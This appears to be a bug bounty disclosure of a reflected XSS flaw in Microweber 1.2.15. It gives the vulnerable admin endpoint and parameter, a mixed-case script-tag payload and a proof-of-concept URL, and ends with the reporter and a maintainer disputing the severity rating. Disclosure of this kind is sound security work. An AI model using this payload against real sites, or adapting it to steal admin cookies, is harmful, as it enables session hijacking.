Reflected XSS in microweber in microweber/microweber
Reported on
Apr 28th 2022
Description
Hi there,
In your latest version (1.2.15) docker here https://registry.hub.docker.com/r/microweber/microweber
, i found an reflected xss
endpoint: http://localhost/admin/view:content/action:settings?group=template&template
param: template
payload: shopmag"><ScRiPt%20>alert(document.cookie)</ScRiPt>
Proof of Concept
http://localhost/admin/view:content/action:settings?group=template&template=shopmag%22%3E%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E
Impact
Execute Arbitrary JavaScript as the attacked user, steal admin cookie...
@maintainer, could you please tell me why this bug is rated low Severity? seem not fair. other report on your project has the same attack vector, same impact and they have been rated high? for example: https://huntr.dev/bounties/16b0547b-1bb3-493c-8a00-5b6a11fca1c5/
Hi, this bug is low severity as it requires admin access
i dont agree with you, i dont need the admin privilege to exploit this vulnerability. in case admin login -> and i can trigger admin to click malicious link, i can steal admin's cookie. how do you caculate the CVSS to mark this as low severity?